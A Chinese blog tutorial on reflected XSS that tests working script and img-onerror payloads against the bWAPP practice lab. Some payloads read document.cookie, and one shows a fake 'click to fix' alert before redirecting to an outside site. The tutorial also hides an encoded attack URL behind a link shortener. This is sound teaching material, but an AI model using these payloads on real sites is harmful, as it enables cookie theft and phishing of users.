WEB安全-跨站脚本攻击XSS

XSS(跨站脚本攻击)

定义

浏览器将用户输入的内容,当做脚本执行,执行了恶意的功能,这种针对用户浏览器的攻击即跨站脚本攻击。

类型

主要分为三种类型:

  • 反射型

  • 存储型

  • DOM 型

XSS 危害

  • 盗取 Cookie
  • 盗取账户
  • 恶意软件下载
  • 键盘记录
  • 广告引流等等 JavaScript 能够写出的任意恶意功能

反射型 XSS

应用程序或 API 包括未经验证或未经转义的用户输入, 直接作为HTML 输出的一部分。一个成功的攻击可以让攻击者在受害者的浏览器中执行任意的 HTML 和 JavaScript 。

特点:非持久化,必须用户点击带有特定参数的链接才能引起。

影响范围:仅执行脚本的用户。

示例

SkyMacBookPro:~ demon$ docker run -d -p 0.0.0.0:8901:80 raesene/bwapp
<script>alert("hello world")</script>

image-20210816101253902

image-20210816102801637

<script>alert("点击此处修复");location.href="http://ceshis.com"</script>

image-20210816101616134

image-20210816103104373

<script>alert(document.cookie)</script>

image-20210816101711093

长网址缩短 (https://www.ft12.com)

http://192.168.43.120:8901/xss_get.php?firstname=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&lastname=1&form=submit

image-20210816103631157

http://33h.co/wr3wj

image-20210816103718366

image-20210816103859911

image-20210816105505263

image-20210816112127046

/><img src=111.png onerror=alert(document.cookie)>

image-20210816112516272

防御措施

反射型 XSS 的限制与防御,危害范围相对较小,多为一次点击触发一次,对陌生的链接,不要随意点开。

练习

对于 bWAPP 的不同类型反射型 XSS 漏洞练习。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值